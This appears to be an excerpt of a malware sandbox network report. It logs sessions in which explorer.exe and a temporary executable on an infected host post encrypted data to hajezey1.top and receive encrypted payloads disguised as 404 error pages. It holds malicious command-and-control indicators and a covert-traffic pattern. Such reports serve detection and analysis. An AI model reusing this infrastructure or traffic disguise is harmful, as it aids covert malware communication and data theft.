Oct 29, 2021 20:49:53.833803892 CEST	2339	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49789	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:53.918287039 CEST	2353	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qflbfkys.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 226 Host: hajezey1.top
Oct 29, 2021 20:49:53.918303013 CEST	2353	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 3b d4 d5 72 Data Ascii: 6152Ek\lwmwu$f]d;ro${gK_vOJ6*ongm3g!$"2Bq?P63]S-bz0<$Uw.(;l`K2L.M$k;[u]a$Bl/Ku#^h;
Oct 29, 2021 20:49:53.997317076 CEST	2379	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac ef 3f ef b2 a9 a6 cc b4 02 47 71 f5 66 3c 3d d0 9f cb 67 14 d8 97 24 c8 b9 fc f0 d4 e8 57 2d 88 d5 74 61 b4 7b 69 ad 66 43 80 1c b7 16 db 64 73 98 f5 51 cf 39 c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 07 1d 02 c1 b9 5a 97 82 fd 11 41 a6 b2 84 35 ce 39 83 ce 85 91 3e 94 d4 54 e5 2f 62 a2 22 27 c6 b9 0a d7 d9 1b c5 89 10 ee 8b ba d7 62 47 d8 ae 85 3a 9d 9b e1 d5 f5 de 38 7f 98 92 ff b0 6a 05 8f a5 0a 9f 36 6f 03 62 53 b5 f8 80 99 8b 84 80 3f 1d b8 3a c0 b4 a7 a4 d0 91 46 e8 81 2f 0d 4d 76 00 94 23 94 b6 07 e8 9a 4a 17 7a c5 42 14 7e 24 a0 84 ba 8b 65 7d bb 8e da 3b 33 f2 82 6c 27 b4 e3 e4 ce fd 5f 98 3b c4 fe da 3d 8f f5 3f 78 14 42 7b f9 e8 f0 85 a5 46 e5 Data Ascii: 1f66S(SW\/iP"&&grq\|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8\|!@+%gt_)xQL=2P0YObyT=a'4 YU\%nIXKg[Ge92)g z6]DEg}cWp$Mk"H2I?o\|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy_:-D%GkKm@NQ>[}J8x,v"JG0Z"?kQTJMQId%\$&Q#F<pvA>C/CbGB24VFv2Bbn6HPg~Pum6'NGc_,/DO9W%J}Tzl9\c=~"}h`1%@N!{K.iw]Ai/mv`pV>`\|PTZ3z[ ^z&+(l%yw*C=;5"No?hs#9cw9iwN7&,X2wlH%f7-/^'Hg7+w&9c1P0{2%#49FwX?,SC;#vddOU^=i=p.oj"?Gqf<=g$W-ta{ifCdsQ9}p5CPZA59>T/b"'bG:8j6obS?:F/Mv#JzB~$e};3l'_;=?xB{F
Oct 29, 2021 20:49:53.997349977 CEST	2380	IN	Data Raw: bb 63 eb 97 62 c6 70 d9 31 d3 48 45 72 08 8e c1 6c c4 f3 bc f0 be bf 3e 00 d0 91 8a 2d 55 76 8c 94 be 70 8d 45 69 a1 84 05 86 e8 c6 3a 1e 4e 30 c8 3f b1 dc a7 36 0d b4 24 76 f3 61 5f ca bd d3 75 2e 18 45 3b e3 34 16 54 57 74 48 8a 38 7a ea 35 51 Data Ascii: cbp1HErl>-UvpEi:N0?6$va_u.E;4TWtH8z5Q*b!F3A2 !Stw %OM:/GIaeuJYAU{l4\|Fs_B3D-BX-!,]1B]&?=mW46yH9e@
Oct 29, 2021 20:49:53.997373104 CEST	2382	IN	Data Raw: 67 72 a2 98 b8 d3 52 89 bc 8c 20 84 cb 39 fc d0 e5 ac f9 cf 3b 7a de 3e 42 79 15 7c ce b7 b1 a8 ea ad 57 95 52 5a 81 7f 29 c9 f9 dc 88 2f b7 bd fd 7d 0b 9e 67 da 03 2f dc ec 4f e6 ff 9b e3 76 f3 62 85 0b 6a ac a6 cd 84 a0 d4 12 ec 6d 80 c2 b0 b9 Data Ascii: grR 9;z>By\|WRZ)/}g/Ovbjm\|y~;m4Y`xxgoSfC6{N\-g2~*3g2g{N<OuR<>G[DsC_pl'^{\|ar)G0:RdqS=.
Oct 29, 2021 20:49:53.997397900 CEST	2383	IN	Data Raw: 7d da 8b 38 8a 86 13 07 48 99 59 83 3d 9b f5 8d 3f e3 1e 40 88 84 34 4b 44 80 0e ce a3 a7 b7 09 de 10 e6 b8 03 fa 38 17 c4 b2 b7 fd 6d 6c fe 88 6c 20 1d 9e 4d a6 62 69 b7 7a a1 6a f0 1c cf da 9c f1 64 6f 76 04 46 78 de dd 49 2b e1 b4 3e 8d 24 47 Data Ascii: }8HY=?@4KD8mll MbizjdovFxI+>$G~,@X!k*b)rG2IDAH)n(up&\|a%va7I^3/7A#5lIX!;RPi:Nx~(,qjSL\|QK oD!
Oct 29, 2021 20:49:53.997421980 CEST	2384	IN	Data Raw: eb 12 3a 1c 28 6e 5f 24 08 5b a5 35 8d 3e 23 75 c1 f7 3e b1 9a 0b d2 92 bb 22 10 1b 92 d7 78 53 f5 dc dd 4c b3 31 8d 8a 89 da b4 d0 4f 22 28 f1 dd ff 53 1a 2e c9 47 bd 1c 97 66 4c 84 55 b6 53 60 c7 a9 62 13 31 61 11 c8 31 2e 5e a8 63 f1 85 30 f7 Data Ascii: :(n_$[5>#u>"xSL1O"(S.GfLUS`b1a1.^c0dt\|R4>fEc5I$J3@2m04kwg?Ha"/3vSZ`.N@oY^].PKa~}~oV_cE3Lann4?IkpT\|Z
Oct 29, 2021 20:49:53.997445107 CEST	2386	IN	Data Raw: ef 57 94 45 f8 84 96 14 6f 74 5f 72 c0 3b e2 07 45 c1 3c d3 e5 ce a9 91 d0 32 e8 6f cd 2d f1 c0 66 c1 58 19 4a 13 c0 ca 13 28 29 b9 27 ab a8 32 ce f9 af 78 4f be 48 8a 74 17 1b 3c 00 c3 af 8a 2c e2 e1 39 ff c9 9e 0c 59 e4 be 6a 18 33 c1 b3 4c 2b Data Ascii: WEot_r;E<2o-fXJ()'2xOHt<,9Yj3L+h.~]~'lfeDzo=0bD?r2PV8gTSdHffs<WEEd/y]kdO]8?O_8{nA6$M)?u?q}rzJ'Op
Oct 29, 2021 20:49:53.997469902 CEST	2387	IN	Data Raw: 56 78 a0 d2 a2 49 6f 98 2a a1 84 fb d1 cf 69 a5 e5 cd d0 82 5e a7 51 e1 4f 80 6d 7a 14 85 48 7a b3 53 aa bb a6 dc 19 71 77 48 2a c5 5c cd 79 23 a9 f5 10 db c9 79 8f 57 36 37 54 df 58 c5 4e 13 8e cf c4 0c c4 9b 4b e3 51 5c 65 77 65 38 47 d3 87 14 Data Ascii: VxIoi^QOmzHzSqwH\y#yW67TXNKQ\ewe8Gg=Bkj_(h1H]Y&'<I4:C%5M]Z\L6gg<']uBk$@HNJY]#jm?2000ov<`;oG>g67k%jK/fH
Oct 29, 2021 20:49:53.997493029 CEST	2388	IN	Data Raw: a8 06 0d e8 7f 36 ac 98 7b a6 ba 34 16 c6 7d 81 b3 8c 7e 38 23 52 17 70 1d 15 9e d6 21 37 6e 61 71 d1 c1 b9 f7 0a d1 c6 ac d8 54 c3 92 ae f6 5a 93 7a 16 2f 14 d2 10 94 97 a7 54 57 be c0 ed 8e 85 63 f2 13 5b ca 46 a1 67 45 38 ae d8 46 a4 c3 68 bc Data Ascii: 6{4}~8#Rp!7naqTZz/TWc[FgE8FhsW-\SpH:.Zzz%m,xnZ!xBz9Wl#%Wrv@K,Xlhi $zZC:"D1[7TMq;/jZH2:>+BD
Oct 29, 2021 20:49:53.997519970 CEST	2390	IN	Data Raw: 00 b4 c1 a7 35 32 ad 7a 75 3e 66 02 fc 8a 3e c1 cf 32 91 b4 ef 7a 3b 20 26 0f 68 d7 af f9 c8 30 be 25 c1 13 de af 23 bf 59 70 27 9c 59 53 e8 49 12 53 7a 17 34 83 44 c7 4f 1f 0b 15 c1 59 cc 62 04 b7 39 58 21 7f 11 10 ae ac 71 08 19 dc 53 ba 06 72 Data Ascii: 52zu>f>2z; &h0%#Yp'YSISz4DOYb9X!qSrsSIu\@ 4Ea?pHu(7gtpfM}y!8YU<kFXn:W>*iEr&IBZ_2X6+!mzHt.J`Kr?.tG57oCPb
Oct 29, 2021 20:49:53.997544050 CEST	2391	IN	Data Raw: 41 88 dd fa 35 91 b0 5c f3 b8 46 6a 9a 2b b5 c5 33 2d c4 52 63 6c 66 c7 8c aa dc ae 2a 01 a4 4f 33 a7 20 db 84 71 47 11 a6 3a ff 73 fa 6e 6f 60 5e 9a 23 f0 81 1b 6c 1f 16 b6 2d 2a 60 88 a0 5d e2 3d 49 05 b9 43 14 63 72 9d 99 91 1b 4c 4c f4 fc 3e Data Ascii: A5\Fj+3-RclfO3 qG:sno`^#l-`]=ICcrLL>q;Qd12]\|Q)V&]P"][ne9t:>)yppD@m'nZjR)}y~^%8>?RV,Tq5mT$u]]L)Nqp`
Oct 29, 2021 20:49:54.048825979 CEST	2400	IN	Data Raw: 5c af 3a 7d bb 59 9d bd df 03 c6 db e8 8a cd f7 ea 01 1b 3e 42 eb 6a 14 f5 40 ac fd d3 d1 2a 57 aa 37 1a b2 ec ea 99 6d e5 cd f1 c0 a7 54 f6 a3 13 9c b0 4c 75 9d 2f 52 c2 75 48 ae 02 e8 82 8a 4c 59 75 5a c0 6c e5 cd ed 9a 75 10 77 82 95 2d 19 8a Data Ascii: \:}Y>Bj@W7mTLu/RuHLYuZluw-dA$vJBp6l1/{;,:kzip_6_}=CSt7WNC6\|l9g1K# ^L"V&"1xNwqQFx&\|:l0Fcq^

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49799	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:57.061491966 CEST	3199	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jyhduujjq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: hajezey1.top
Oct 29, 2021 20:49:57.061844110 CEST	3200	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 97 66 5d 02 c9 a1 c1 64 01 87 d1 31 Data Ascii: 6152Ek\lwmwu$f]d1caeQa{WJaOB~\|FA\|/R\L2f9m{cag\|,)P(w:4{}HBDr'
Oct 29, 2021 20:49:57.137011051 CEST	3200	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49817	162.159.130.233	443	C:\Users\user\AppData\Local\Temp\69B.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49801	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:57.789051056 CEST	3201	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yetpvqx.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 232 Host: hajezey1.top
Oct 29, 2021 20:49:57.789071083 CEST	3202	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 3d b6 df 08 Data Ascii: 6152Ek\lwmwu$f]d=>fU5M!yV,eE`b<j;h]l.MhX?i2]J $Z268pw?,*W!]-m3-=~KUWawbaPS
Oct 29, 2021 20:49:57.868571997 CEST	3207	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Fri, 29 Oct 2021 18:49:57 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 56 3b 38 a6 15 e4 c6 ce a9 22 27 90 32 fb 10 df b7 b7 c8 10 46 15 b1 97 4c c3 f9 8c e2 58 e9 9c b7 3d ef ce 38 1f c1 19 39 ec a8 01 8f 44 ea 9b bf 6e c0 53 5b 76 cb c4 bd 8f 46 84 7f 9c b8 6a f7 5b 61 67 85 1a aa 50 f1 33 0d 4d 9e 1f ed 23 97 05 42 e0 c9 1c 9c 4a be 99 95 43 d2 7c 6c b8 4f 4e 7d bb ad 45 43 37 86 96 3f d8 a1 f7 94 8f c9 3b cb 53 94 6d 9b 3d 70 e0 53 08 55 42 da 49 3b b1 85 2c 03 39 Data Ascii: 1f66S(SW\/iP"&&grq\|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RY8\|-:+%Wt#xQP0ObyT=a'4 YW\\|;fKMXKw[Ge)29E"\|6N}oczUpJk"HBI?m\|6NI^LdU[0zU5=PoV`GZdQJVqu~dwy'$X9:-C'GkKm1`#>[qJ8-,sqK0Z"?+QzJMQAd'\#&Q#2YBA6?C/fGB%4VF>"7"h*6VPgt 4k6'NGc:HNDP8W%WbJ}Tzl9\@nGL"}b1@$@N!;KnGA_OW`kg";kz{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59V;8"'2FLX=89DnS[vFj[agP3M#BJC\|lON}EC7?;Sm=pSUBI;,9
Oct 29, 2021 20:49:57.868619919 CEST	3208	IN	Data Raw: 1a d7 38 d6 62 4f 35 3d bc 96 b0 cc 2f f0 49 84 b8 7d 8a 8b 6e 56 22 c1 ff 2f 0c cd fd 4c f7 b1 6a 48 bb 8f 13 4a b9 84 70 d0 65 a9 08 3d 3f 00 5c 74 31 8e f4 65 f6 d2 1a 06 b2 6b b7 98 29 92 71 d0 86 d1 cc 16 4b 45 ab 42 f4 4b ca 38 29 b3 e6 06 Data Ascii: 8bO5=/I}nV"/LjHJpe=?\t1ek)qKEBK8)y}s~PG`hSH95!926jRdB<[R[^%3V9l{j Wx#g.v/hW.%_6% &<v0p>=, 3zY
